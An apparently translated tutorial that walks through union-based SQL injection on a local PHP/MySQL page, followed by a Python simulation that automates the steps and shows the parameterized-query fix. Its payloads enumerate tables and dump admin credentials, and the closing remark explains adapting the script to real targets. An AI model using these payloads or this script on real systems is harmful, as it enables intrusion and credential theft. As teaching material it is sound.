The basic process of php+mysql injection

Source: Internet
Author: User
Tags: mysql injection

1: Verifying the injection (and 1=1)

URL: http://127.0.0.1/test.php?id=9 and 1=1
SQL statement: SELECT * FROM article WHERE id = 9 and 1=1; the page returns normally.

URL: http://127.0.0.1/test.php?id=9 and 1=2
SQL statement: SELECT * FROM article WHERE id = 9 and 1=2; the page returns an error or an empty page, because no row matches.

Note that the id is concatenated into the query unquoted (a numeric context). That is what lets the injected and clause become part of the WHERE condition instead of part of a string value.

2: Determining the number of columns (ORDER BY and UNION)

2.1 ORDER BY

URL: http://127.0.0.1/test.php?id=9 order by 4
SQL statement: SELECT * FROM article WHERE id = 9 ORDER BY 4;

ORDER BY n in a SQL statement sorts the result set by its n-th column, so the statement fails as soon as n is larger than the number of columns the query returns. Increase n one at a time (order by 1, order by 2, ...).

Example: if order by 6 still returns normally and order by 7 errors, the query returns exactly 6 columns.

2.2 UNION SELECT

URL: http://127.0.0.1/test.php?id=9 union select null,null,null,null,null,null
SQL statement: SELECT * FROM article WHERE id = 9 UNION SELECT null,null,null,null,null,null;

UNION combines the result sets of two or more SELECTs, but with one condition: every SELECT must return the same number of columns, otherwise the statement fails. We use this to confirm the count: when the number of values in our union select equals the number of columns in the original query, the page returns normally.

For example: with 6 values the page returns normally; with more or fewer than 6 the page errors.

Two minor problems to solve:

Problem one: most programs only render the first row returned by the database query (ours does too), and in a UNION result the data we want is in the second row. There are two ways to see it: make the first SELECT return nothing, or select the row we want directly with a SQL clause.

Method one: make the condition of the first query always false

URL: http://127.0.0.1/test.php?id=9 and 1=2 union select null,null,null,null,null,null
SQL statement: SELECT * FROM article WHERE id = 9 and 1=2 UNION SELECT null,null,null,null,null,null

Result: the page displays nothing. Why? Because our second SELECT only returns NULLs, so there is nothing to show. Running the statement directly in MySQL confirms this: it returns a single row of six NULLs.

Method two: use the LIMIT clause. In MySQL, LIMIT is used for paging, and we can also use it to pick the row we want out of the result set. LIMIT offset,count skips offset rows and returns count rows: the real article is row 0 and our UNION row is row 1, so LIMIT 1,1 returns only the injected row (the LIMIT at the end of the statement applies to the whole UNION result).

URL: http://127.0.0.1/test.php?id=9 union select null,null,null,null,null,null limit 1,1
SQL statement: SELECT * FROM article WHERE id = 9 UNION SELECT null,null,null,null,null,null LIMIT 1,1

Result: also empty, for the same reason as above (the selected row is all NULLs).

Problem two: which columns are displayed on the page? Some columns may only be used by the backend for processing and are never shown in the frontend, so we need to find out which positions we can see. We replace the NULLs with the numbers 1 to 6 and look for the numbers on the page; here we determine that positions 2, 3, 4 and 5 are displayed.

Why didn't we start with numbers instead of NULL? Because UNION requires not only the same number of columns but also compatible data types in each position (MySQL is lenient and coerces, other databases are strict), and NULL is compatible with every column type. Once the count is known, numbers are safe markers.

URL: http://127.0.0.1/test.php?id=9 and 1=2 union select 1,2,3,4,5,6
SQL statement: SELECT * FROM article WHERE id = 9 and 1=2 UNION SELECT 1,2,3,4,5,6

3. Finding the database name

MySQL's built-in function database() returns the name of the current database; putting it into a displayed position shows it on the page. Here the database is test.

URL: http://127.0.0.1/test.php?id=9 and 1=2 union select 1,database(),3,4,5,6
SQL statement: SELECT * FROM article WHERE id = 9 and 1=2 UNION SELECT 1,database(),3,4,5,6

Result: test is displayed

4. Finding the table names

Table names come from the tables table of the information_schema database. Because we need to find the table that holds the sensitive data, we use GROUP_CONCAT, which concatenates all rows of the query into one string, so a single displayed field shows every table name at once. Our goal here is the admin table.

URL: http://127.0.0.1/test.php?id=9 and 1=2 union select 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema='test'
SQL statement: SELECT * FROM article WHERE id = 9 and 1=2 UNION SELECT 1,group_concat(table_name),3,4,5,6 FROM information_schema.tables WHERE table_schema='test'

Result: all table names are displayed; the first is admin.

Note that GROUP_CONCAT truncates its output at group_concat_max_len (1024 bytes by default), so on a database with many tables the list may be cut off; LIMIT with an offset on the inner query can page through the rest.

5. Finding the columns:
Again the information_schema database is used, this time its columns table. We get the fields id, username, password.

URL: http://127.0.0.1/test.php?id=9 and 1=2 union select 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_schema='test' and table_name='admin'
SQL statement: SELECT * FROM article WHERE id = 9 and 1=2 UNION SELECT 1,group_concat(column_name),3,4,5,6 FROM information_schema.columns WHERE table_schema='test' AND table_name='admin'

Result: id,username,password

6: Reading the data

URL: http://127.0.0.1/test.php?id=9 and 1=2 union select 1,group_concat(id,username,password),3,4,5,6 from admin
SQL statement: SELECT * FROM article WHERE id = 9 and 1=2 UNION SELECT 1,group_concat(id,username,password),3,4,5,6 FROM admin

The results are displayed. GROUP_CONCAT with several arguments joins them with no separator, so the values of one row run together; wrapping them as group_concat(concat_ws(':',id,username,password)) keeps each row readable.
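The whole six-step procedure, as an added example that is not part of the original article: a Python simulation in which sqlite3 stands in for the MySQL server so it runs offline. The test.php stand-in vulnerable_page concatenates the id parameter the way the article describes and renders positions 2 to 5 of the first row; safe_page is the same page with a parameterized query. The article and admin tables and their rows are constructed sample data, and the schema queries use sqlite's own catalog (sqlite_master, pragma_table_info, the || operator) in place of information_schema, database() and concat_ws, as marked in the comments.

```python
"""Offline simulation of the union-based injection walkthrough above.

Added example, not code from the original article. sqlite3 stands in for
MySQL; where MySQL syntax differs the sqlite equivalent is used and marked.
The tables and rows below are constructed sample data.
"""
import sqlite3

SHOWN = (2, 3, 4, 5)  # 1-based positions test.php renders; the attacker must discover these


def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE article(id INTEGER, title TEXT, body TEXT, author TEXT, created TEXT, hits INTEGER);
        INSERT INTO article VALUES (9, 'Hello', 'First post', 'alice', '2010-01-01', 3);
        CREATE TABLE admin(id INTEGER, username TEXT, password TEXT);
        INSERT INTO admin VALUES (1, 'admin', 'secret');
    """)
    return db


def vulnerable_page(db, raw_id):
    """test.php as the article describes it: the GET parameter is pasted into the
    SQL string and only the first returned row is rendered (positions in SHOWN).
    Returns the rendered tuple, None for an empty result, or 'ERROR' when the
    database rejects the statement."""
    sql = "SELECT * FROM article WHERE id=" + raw_id
    try:
        row = db.execute(sql).fetchone()
    except sqlite3.Error:
        return "ERROR"
    return None if row is None else tuple(row[i - 1] for i in SHOWN)


def safe_page(db, raw_id):
    """Hardened test.php: a parameterized query, so the payload is only a value."""
    row = db.execute("SELECT * FROM article WHERE id=?", (raw_id,)).fetchone()
    return None if row is None else tuple(row[i - 1] for i in SHOWN)


def is_injectable(page):
    """Step 1: 'and 1=1' behaves like the plain id while 'and 1=2' does not."""
    return page("9 and 1=1") == page("9") and page("9 and 1=2") != page("9")


def count_columns_order_by(page, max_cols=64):
    """Step 2.1: ORDER BY n succeeds up to the column count and errors at n+1."""
    for n in range(1, max_cols + 1):
        if page(f"9 ORDER BY {n}") == "ERROR":
            return n - 1
    return None


def count_columns_union(page, max_cols=64):
    """Step 2.2: UNION SELECT NULL,... only succeeds when the NULL count matches."""
    for n in range(1, max_cols + 1):
        if page("9 and 1=2 UNION SELECT " + ",".join(["NULL"] * n)) != "ERROR":
            return n
    return None


def visible_positions(page, ncols):
    """Problem two: substitute 1..n for the NULLs; the numbers that show up on
    the page mark the columns that are rendered."""
    shown = page("9 and 1=2 UNION SELECT " + ",".join(str(i) for i in range(1, ncols + 1)))
    return [i for i in range(1, ncols + 1) if i in shown]


def extract(page, ncols, visible, expr, from_clause=""):
    """Steps 3-6: place an expression in the first visible slot and read it back.
    'and 1=2' is the article's method one: the real row is suppressed, so the
    UNION row is the first (and only) row the page renders."""
    slot = visible[0]
    cols = ["NULL"] * ncols
    cols[slot - 1] = expr
    shown = page(f"9 and 1=2 UNION SELECT {','.join(cols)} {from_clause}")
    return shown[visible.index(slot)]


def run_walkthrough(db):
    page = lambda raw: vulnerable_page(db, raw)
    ncols = count_columns_order_by(page)
    visible = visible_positions(page, ncols)
    # MySQL: information_schema.tables WHERE table_schema=database(); sqlite: sqlite_master
    tables = extract(page, ncols, visible, "group_concat(name)",
                     "FROM sqlite_master WHERE type='table'")
    # MySQL: information_schema.columns WHERE table_name='admin'; sqlite: pragma_table_info
    columns = extract(page, ncols, visible, "group_concat(name)",
                      "FROM pragma_table_info('admin')")
    # MySQL: group_concat(concat_ws(':', id, username, password)); sqlite concatenates with ||
    rows = extract(page, ncols, visible,
                   "group_concat(id || ':' || username || ':' || password)", "FROM admin")
    return {"injectable": is_injectable(page), "columns": ncols,
            "union_columns": count_columns_union(page), "visible": visible,
            "tables": tables, "admin_columns": columns, "admin_rows": rows}


if __name__ == "__main__":
    db = make_db()
    print(run_walkthrough(db))
    print(safe_page(db, "9"), safe_page(db, "9 and 1=1"))
```

Against a real target, vulnerable_page is replaced by a function that sends the HTTP request and classifies the response (error page, empty page, or the rendered fields); the probing logic stays the same. The parameterized version shows why the fix works: the same "9 and 1=1" payload is bound as a string literal, compares unequal to the integer id column, and matches nothing, so the step-1 probe fails.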
